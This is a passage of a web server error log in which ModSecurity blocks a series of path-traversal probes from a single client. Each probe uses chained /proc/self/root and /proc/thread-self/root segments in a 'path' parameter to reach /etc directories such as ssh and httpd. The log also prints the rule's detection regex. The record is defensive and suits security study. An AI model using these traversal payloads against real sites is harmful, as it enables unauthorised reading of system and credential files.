"www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PihCii7xarUs8iHZTEQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:12:57.644159 2026] [:error] [pid 11642:tid 140411641214720] [client 74.7.243.128:35924] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pmbninkcc-iUj5ApJhQAAA4w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:01.171490 2026] [:error] [pid 10189:tid 140411733534464] [client 74.7.243.128:60754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PnTJ3M9BSuKP7CAYCxgAAAIE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:13:02.660320 2026] [:error] [pid 11167:tid 140411582465792] [client 74.7.243.128:37404] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PnvHIg5MgXLBnicPk0wAAAdM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:13:04.977645 2026] [:error] [pid 9818:tid 140411683178240] [client 74.7.243.128:37418] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PoF1pVZ5mVmJwsFMbTwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:09.555118 2026] [:error] [pid 31215:tid 140411599251200] [client 74.7.243.128:37432] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PpQF0L0L-SsrnPo5S4QAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:11.631848 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.243.128:52452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PpvqxLDW4GITHUkTQsgAAAQM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:13:22.806845 2026] [:error] [pid 7893:tid 140411607643904] [client 74.7.243.128:52466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PshCii7xarUs8iHZTQQAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:24.082481 2026] [:error] [pid 11167:tid 140411590858496] [client 74.7.243.128:52084] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PtPHIg5MgXLBnicPk4gAAAdI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:25.378893 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:52088] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PtfXLqtnMIWvjpaKFYQAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:27.750517 2026] [:error] [pid 31215:tid 140411708356352] [client 74.7.243.128:52104] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PtgF0L0L-SsrnPo5S6QAAAsQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:13:31.527673 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:52114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PuzJ3M9BSuKP7CAYC3QAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:32.947979 2026] [mime_magic:error] [pid 7235:tid 140411666392832] (70014)End of file found: [client 57.141.18.109:52174] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 06:13:41.729284 2026] [:error] [pid 9818:tid 140411741927168] [client 74.7.243.128:58400] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PxV1pVZ5mVmJwsFMbZwAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:45.908390 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:50094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PyRCii7xarUs8iHZTYwAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:47.238691 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.243.128:50106] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PywF0L0L-SsrnPo5S8QAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 06:13:49.574928 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:50114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pzda6ubjKNq_cu4a9qwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:50.124701 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:50114] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0Pzta6ubjKNq_cu4a9rAAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 06:13:51.503047 2026] [:error] [pid 31215:tid 140411649607424] [client 74.7.243.128:36108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0PzwF0L0L-SsrnPo5S8gAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:52.746383 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:36120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P0DJ3M9BSuKP7CAYC6QAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:55.117199 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:36128] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P0_qxLDW4GITHUkTQ0gAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:56.425385 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:36134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P1BCii7xarUs8iHZTbQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 06:13:59.803161 2026] [:error] [pid 11167:tid 140411624429312] [client 74.7.243.128:36146] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0P1_HIg5MgXLBnicPk-AAAAc4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
